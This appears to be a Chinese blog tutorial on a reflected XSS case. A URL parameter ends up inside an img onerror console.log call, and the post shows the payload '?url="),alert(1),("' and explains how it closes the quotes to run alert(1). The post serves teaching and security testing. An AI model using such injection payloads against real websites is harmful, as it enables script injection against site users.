XSS漏洞(一)

关键词

  • onerror

  • console.log

  • 一个事件函数执行多个事件脚本

示例

URL

www.example.com/1.php?url=/images/1.png

html代码

<img src="/images/1.png" onerror="console.log("/images/1.png";)">

难点

  • 认识console.log()函数,该函数的作用是在控制台进行输出

  • 与一般的console.log()中的xss存在区别,主要在与console.log("")内是引号引起来的成为了文本,而不是代码,在控制台会直接输出而不会执行,所以不能通过console.log("")来打xss

思路

利用onerror函数来执行javascript

测试

构造payload

?url="),alert(1),("

最终html代码

<img src=""),alert(1),("" onerror="console.log(""),alert(1),("")">

前后代码比较

前:<img src="/images/1.png" onerror="console.log("/images/1.png";)">
payload:?url="),alert(1),("
后:<img src=""),alert(1),("" onerror="console.log(""),alert(1),("")">

解释

  • 先将console.log函数闭合

  • 将末尾的引号闭合

  • 中间加入需要执行的事件代码alert(1)

  • 使用逗号将三者隔离开

  • 最终整个语句的意思为:图片未能加载出来,故onerror事件函数开始执行,执行了下面3个     

  1. console.log("")

  1. alert(1)

  1. ("")

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sf5003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值